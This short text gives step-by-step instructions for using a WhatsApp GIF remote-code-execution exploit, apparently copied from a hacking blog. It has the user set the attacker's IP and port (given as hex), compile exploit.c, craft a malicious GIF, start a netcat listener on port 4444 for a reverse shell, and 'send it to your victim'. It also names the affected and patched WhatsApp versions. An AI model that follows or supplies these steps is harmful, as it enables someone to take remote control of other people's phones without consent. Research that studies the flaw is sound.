
Modify the listening address (attacker's) and the listening port in the exploit.c file
Following hex code:
3139 322e 3136
382e 322e 3732 2034 3434 3420
Compile the code:
gcc -o exploit egif_lib.c exploit.c
Run the compiled file ./exploit exploit.gif
copy/paste the output into a gif
Start the netcat listener:
nc -lvp 4444
Send it to your victim!
Affected versions: 2.19.230 and below
Officially patched in version 2.19.244
Source: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
LinkedIn : https://www.linkedin.com/in/thomas-lounis-749456175/